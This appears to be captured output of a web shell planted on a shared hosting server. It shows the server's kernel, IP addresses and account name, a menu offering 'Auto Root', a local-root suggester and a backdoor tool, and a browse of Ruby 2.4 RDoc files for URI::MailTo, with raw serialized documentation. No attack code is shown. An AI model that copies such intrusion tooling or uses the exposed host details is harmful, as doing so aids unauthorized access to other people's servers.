Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby24 /
share /
ri /
2.4.0 /
system /
URI /
MailTo /
Delete
Unzip
Name
Size
Permission
Date
Action
build-c.ri
1.5
KB
-rw-r--r--
2023-07-26 18:18
cdesc-MailTo.ri
1.05
KB
-rw-r--r--
2023-07-26 18:18
check_headers-i.ri
449
B
-rw-r--r--
2023-07-26 18:18
check_to-i.ri
305
B
-rw-r--r--
2023-07-26 18:18
headers%3d-i.ri
300
B
-rw-r--r--
2023-07-26 18:18
headers-i.ri
320
B
-rw-r--r--
2023-07-26 18:18
new-c.ri
564
B
-rw-r--r--
2023-07-26 18:18
set_headers-i.ri
317
B
-rw-r--r--
2023-07-26 18:18
set_to-i.ri
302
B
-rw-r--r--
2023-07-26 18:18
to%3d-i.ri
285
B
-rw-r--r--
2023-07-26 18:18
to-i.ri
308
B
-rw-r--r--
2023-07-26 18:18
to_mailtext-i.ri
694
B
-rw-r--r--
2023-07-26 18:18
to_rfc822text-i.ri
287
B
-rw-r--r--
2023-07-26 18:18
to_s-i.ri
295
B
-rw-r--r--
2023-07-26 18:18
Save
Rename
U:RDoc::AnyMethod[iI" build:EFI"URI::MailTo::build;TT:publico:RDoc::Markup::Document:@parts[S:RDoc::Markup::Heading: leveli: textI"Description;To:RDoc::Markup::BlankLine o:RDoc::Markup::Paragraph; [I"LCreates a new URI::MailTo object from components, with syntax checking.;T@ o;; [I"JComponents can be provided as an Array or Hash. If an Array is used, ;TI"6the components must be supplied as [to, headers].;T@ o;; [I"LIf a Hash is used, the keys are the component names preceded by colons.;T@ o;; [I"BThe headers can be supplied as a pre-encoded string, such as ;TI"B"subject=subscribe&cc=address", or as an Array of Arrays like;To:RDoc::Markup::List: @type: LABEL:@items[o:RDoc::Markup::ListItem:@label[I"0['subject', 'subscribe'], ['cc', 'address'];T; [o;; [I"Examples:;T@ o:RDoc::Markup::Verbatim; [I"require 'uri' ;TI" ;TI"Am1 = URI::MailTo.build(['joe@example.com', 'subject=Ruby']) ;TI";puts m1.to_s -> mailto:joe@example.com?subject=Ruby ;TI" ;TI"em2 = URI::MailTo.build(['john@example.com', [['Subject', 'Ruby'], ['Cc', 'jack@example.com']]]) ;TI"Pputs m2.to_s -> mailto:john@example.com?Subject=Ruby&Cc=jack@example.com ;TI" ;TI"dm3 = URI::MailTo.build({:to => 'listman@example.com', :headers => [['subject', 'subscribe']]}) ;TI"Cputs m3.to_s -> mailto:listman@example.com?subject=subscribe;T:@format0: @fileI"lib/uri/mailto.rb;T:0@omit_headings_from_table_of_contents_below000[ I"(args);T@1TI"MailTo;TcRDoc::NormalClass00